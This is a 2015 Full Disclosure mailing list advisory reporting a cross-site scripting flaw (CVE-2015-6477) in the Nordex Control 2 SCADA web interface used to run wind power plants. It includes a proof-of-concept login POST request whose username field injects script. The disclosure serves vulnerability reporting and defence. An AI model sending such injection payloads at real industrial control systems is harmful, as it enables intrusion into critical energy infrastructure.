Full Disclosure mailing list archives
Nordex Control 2 (NC2) SCADA V16 and prior versions - XSS
From: Karn Ganeshen <karnganeshen () gmail com>
Date: Thu, 24 Dec 2015 18:05:42 +0000
*Nordex NC2 XSS Vulnerability* *AFFECTED PRODUCTS* Nordex Control 2 (NC2) SCADA V16 and prior versions. Nordex is a company based in Germany that maintains offices in countries around the world. The affected product, Nordex Control 2, is a web-based SCADA system for wind power plants. According to Nordex, NC2 is deployed across the Energy sector. Nordex estimates that this product is used primarily in the United States, Europe, and China. *CVE-ID* CVE-2015-6477 *Reference* https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 *Vulnerable parameter* username *PoC* POST /login HTTP/1.1 connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en -- Best Regards, Karn Ganeshen _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Nordex Control 2 (NC2) SCADA V16 and prior versions - XSS Karn Ganeshen (Dec 24)